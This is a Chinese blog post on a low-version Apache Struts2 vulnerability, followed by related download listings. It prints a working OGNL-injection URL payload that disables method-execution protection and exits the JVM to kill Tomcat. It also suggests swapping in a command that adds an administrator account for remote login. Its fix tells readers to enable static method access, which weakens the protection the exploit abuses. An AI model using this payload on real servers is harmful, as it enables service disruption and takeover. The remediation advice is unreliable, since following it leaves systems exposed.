`

Struts2低版本安全漏洞及解决办法

 
阅读更多

 

Strusts2的低版本漏洞相信大家都知道了,前几天的时候尝试了一下,果然危害极大

      其实不用知道太多,我们只需要知道

      ?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

    会转换成:

     ?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

    这就等价于:

    java.lang.Runtime.getRuntime().exit(1); 

   也就是说的关闭当前tomcat

   当然我们也可以使用net user admin 123/add +****

   这样的话我们就可以获得远程登录权限....,你懂的。

   解决办法如下:

替换如下的包
commons-fileupload-1.2.2.jar
commons-io-2.0.1.jar
commons-lang-2.5.jar
freemarker-2.3.18.jar
javassist-3.11.0.GA.jar(必须)
ognl-3.0.3.jar(必须)
struts2-core-2.3.1.jar(必须)
xwork-core-2.3.1.jar(必须)
struts2-spring-plugin-2.3.1.2.jar(必须)
2.修改struts.xml文件在头部加入这句话<constant name="struts.ognl.allowStaticMethodAccess" value="true"></constant> (允许标签使用静态方法)
3.修改web.xml把
org.apache.struts2.dispatcher.FilterDispatcher替换为
org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter

 

分享到:
评论

相关推荐

    Struts2 安全漏洞解决方法

    Struts2 安全漏洞解析,距离上个版本发布仅仅过去1周,apache struts官网又发布struts2最新版本安全公告,主要修复了一个漏洞,代号S2-022:从漏洞简要描述来看,确定是对之前S2-021的补充。

    Apache的Struts2框架严重安全漏洞

    总之,面对Apache Struts2框架的安全漏洞,最重要的是保持框架版本的更新,同时对输入进行严格的验证和过滤,以防止恶意OGNL表达式的执行。此外,建立全面的安全防御体系,包括日志监控、代码审计和团队培训,是保护...

    struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx

    S2-045 漏洞是一个严重的安全漏洞,影响 Struts2 的多个版本,包括 2.3.5-2.3.31 和 2.5-2.5.102。该漏洞是由于 Struts2 中的 MultiPartRequestWrapper 类中的一个错误导致的,该错误可能会导致攻击者可以上传恶意...

    关于struts2漏洞问题及解决办法

    这篇博客文章“关于struts2漏洞问题及解决办法”可能详细探讨了Struts2框架中的一些关键安全问题,以及如何通过更新、配置优化或使用安全工具来应对这些问题。 首先,Struts2最臭名昭著的漏洞是S2-045,这是一个...

    struts2 最新漏洞 S2-016、S2-017修补方案 .docx

    最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者执行恶意代码,从而危害到网站的安全。 S2-016 漏洞是由于 Struts2 的 Ognl 表达式语言解析器存在缺陷,从而导致攻击者...

    struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017

    然而,这个框架的历史上存在一系列的安全漏洞,其中特别值得关注的是与反序列化相关的漏洞,如s2-005、s2-016、s2-016_3和s2-017。这些漏洞允许攻击者通过精心构造的输入,利用Struts2的内置机制执行任意代码,从而...

    Struts2漏洞检查工具2017版

    然而,随着时间的推移,Struts2框架发现了一系列的安全漏洞,这些漏洞可能被恶意攻击者利用来执行任意代码,对系统安全构成严重威胁。本"Struts2漏洞检查工具2017版"正是针对这些问题而设计的,它包含了对多个已知...

    struts2-016/017漏洞解决

    然而,任何软件都可能存在安全漏洞,Struts2也不例外。"struts2-016/017漏洞"指的是两个在Struts2框架中被发现的安全问题,它们对使用该框架的应用程序构成了严重的威胁。 Struts2 S2-016漏洞,全称为“Struts2 ...

    Apache_Struts2漏洞(S2-045,CVE-2017-5638)

    然而,就像任何其他复杂的软件系统一样,Struts2也存在安全漏洞。其中,S2-045 和 CVE-2017-5638 是一个极其严重的问题,可能导致远程代码执行(RCE),进而让攻击者完全控制受影响的服务器。 S2-045 漏洞,官方...

    Struts2漏洞利用工具2017版

    解决方法是禁用REST插件或升级Struts2到修复此漏洞的版本。 S2-016,名为“Struts2 ExecuteAction和ResultAction插件远程代码执行漏洞”,该漏洞存在于ExecuteAction和ResultAction插件中,使得攻击者可以利用OGNL...

    Struts2漏洞利用工具Devmode版

    然而,如同其他复杂的软件系统,Struts2在过去的几年中也发现了一系列的安全漏洞,这些漏洞可能导致远程代码执行、敏感信息泄露等问题,对企业的信息系统安全构成威胁。"Struts2漏洞利用工具Devmode版"就是针对这些...

    struts2 漏洞利用工具.rar

    解决方法是升级到不受影响的Struts2版本,并正确配置安全策略。 4. **检测工具**: 压缩包中的“struts2 漏洞利用工具”可能包括了自动化脚本或工具,用于扫描目标系统是否存在上述或其他Struts2漏洞。这些工具...

    Struts2远程执行漏洞 Jar包集合体

    然而,随着时间的推移,Struts2框架发现了一系列的安全漏洞,这些漏洞可能导致远程代码执行(RCE)风险,使攻击者能够完全控制受影响的服务器。在给定的标题和描述中,提到了几个关键的Struts2漏洞,包括S2-057、S2-...

    Struts2漏洞检测工具2018年8月版本

    然而,随着时间的推移,Struts2框架发现了一系列的安全漏洞,这些漏洞可能导致远程代码执行、敏感信息泄露等问题,对使用该框架的系统构成了严重威胁。2018年8月的"Struts2漏洞检测工具"正是为了帮助用户识别和修复...

    Struts2漏洞检查工具2019版 V2.3.zip

    1. **及时更新**:保持Struts2框架和所有相关插件的版本是最新的,以修复已知的安全漏洞。 2. **输入验证**:对用户提交的所有数据进行严格的验证和过滤,防止恶意输入。 3. **安全配置**:正确配置Struts2框架,...

    【2017版】Struts2漏洞检查工具

    标题提到的“2017版Struts2漏洞检查工具”是专门设计用于检测上述安全漏洞的实用程序。它能够帮助管理员和开发人员识别并修复他们的Struts2应用程序中存在的安全风险。通过运行这个工具,用户可以确保其应用免受恶意...

    struts2核心jar包(漏洞已经修复)

    然而,Struts2在过去曾遭受过多个安全漏洞的影响,其中一些漏洞可能导致远程代码执行(RCE)和其他严重的安全风险。标题中的“struts2核心jar包(漏洞已经修复)”表明这是一个已经解决了已知安全问题的最新版本,...

    jboss与struts漏洞解决

    《JBoss与Struts漏洞解决详解》 在信息技术领域,安全问题始终是不容忽视的关键环节。本文主要针对两个常见的漏洞——JBoss漏洞和Struts漏洞,详述其情况、影响以及解决方案,旨在帮助用户理解漏洞的危害并采取有效...

Global site tag (gtag.js) - Google Analytics